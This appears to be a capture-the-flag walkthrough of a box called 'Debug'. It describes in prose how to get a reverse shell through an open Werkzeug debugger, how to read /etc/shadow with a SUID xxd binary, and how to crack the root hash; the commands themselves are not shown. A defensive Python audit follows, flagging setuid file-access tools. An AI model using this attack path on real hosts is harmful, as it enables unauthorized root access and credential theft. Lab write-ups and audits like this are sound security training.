Debug
Web service is open on port 80
Let's check the website in the browser.
After some time exploring the web pages, I noticed this website is running Flask and the Werkzeug debug tool is enabled.
We can easily get a reverse shell since the PIN code of Werkzeug is not enabled and we can execute any Python command. To do that, first set up a reverse shell listener.
Craft your favorite reverse shell payload, but in this case, I would use Python.
Proceed to the Werkzeug debugger, spawn an interactive Python interpreter and execute the following.
You should receive your shell right away.
First, let's transfer linpeas.sh from our machine to the target machine.
You can find the machine IP address by executing the following.
Then transfer the script using wget.
And run linpeas.sh.
After quite some time running, you will notice the xxd binary has SUID set.
We can read /etc/shadow by using this binary. Execute the following to do so.
Copy the output to your local machine, and run these hashes through john. After a few seconds, you will get the root password.
Run su root to log in as root.
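Seen from the defender's side, the SUID bit on xxd is the kind of drift a host audit should flag. The script below is an added example, not part of the original write-up: it walks common binary directories and reports setuid-root files that are either outside an expected baseline or are file-access utilities such as xxd. The baseline set, the watchlist and the scanned directories are constructed assumptions to adapt per host.

```python
import os
import stat

# Assumption: baseline of setuid-root binaries this host is expected to ship;
# build the real list from your distribution's package manifest.
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo",
                 "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/chsh"}
# Constructed watchlist: tools that read or copy arbitrary files, so setuid
# root on any of them exposes files such as /etc/shadow.
FILE_ACCESS_TOOLS = {"xxd", "cat", "cp", "dd", "base64"}


def classify(path, mode, uid):
    """Return 'ok', 'unexpected' or 'critical' for one file's stat data."""
    if not (stat.S_ISREG(mode) and mode & stat.S_ISUID and uid == 0):
        return "ok"  # not a setuid-root regular file
    if os.path.basename(path) in FILE_ACCESS_TOOLS:
        return "critical"  # checked first: never acceptable, baseline or not
    return "ok" if path in EXPECTED_SUID else "unexpected"


def audit(roots=("/usr", "/bin", "/sbin", "/opt")):
    """Walk the given roots and return sorted (severity, path) findings."""
    findings = set()
    # Resolve roots first so merged-/usr symlinks (/bin -> /usr/bin) are
    # scanned once and paths match the baseline.
    for root in {os.path.realpath(r) for r in roots}:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: never follow symlinks
                except OSError:
                    continue  # vanished or unreadable entry
                verdict = classify(path, st.st_mode, st.st_uid)
                if verdict != "ok":
                    findings.add((verdict, path))
    return sorted(findings)


if __name__ == "__main__":
    for severity, path in audit():
        print(f"{severity:10} {path}  (clear with: chmod u-s {path})")
```

Run it as root on a schedule and alert on any output; a "critical" line for xxd is exactly the misconfiguration used in this box.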
Thanks for reading, and enjoy the rest of your day! :D